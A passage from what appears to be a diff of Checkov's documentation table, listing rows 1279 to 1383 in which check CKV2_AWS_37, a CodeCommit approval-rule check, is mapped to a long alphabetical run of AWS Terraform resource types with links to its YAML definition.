[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1279 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1280 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1281 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1282 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1283 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1284 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1285 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1286 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1287 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1288 | CKV2_AWS_37 | resource | aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1289 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1290 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1291 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1292 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1293 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1294 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1295 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1296 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1297 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1298 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1299 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1300 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1301 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1302 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1303 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1304 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1305 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1306 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1307 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1308 | CKV2_AWS_37 | resource | aws_redshift_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1309 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1310 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1311 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1312 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1313 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1314 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1315 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1316 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1317 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1318 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1319 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1320 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1321 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1322 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1323 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1324 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1325 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1326 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1327 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1328 | CKV2_AWS_37 | resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1329 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1330 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1331 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1332 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1333 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1334 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1335 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1336 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1337 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1338 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1339 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1340 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1341 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1342 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1343 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1344 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1345 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1346 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1347 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1348 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1349 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1350 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1351 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1352 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1353 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1354 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1355 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1356 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1357 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1358 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1359 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1360 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1361 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1362 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1363 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1364 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1365 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1366 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1367 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1368 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1369 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1370 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1371 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1372 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1373 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1374 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1375 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1376 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1377 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1378 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1379 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1380 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1381 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1382 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1383 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | 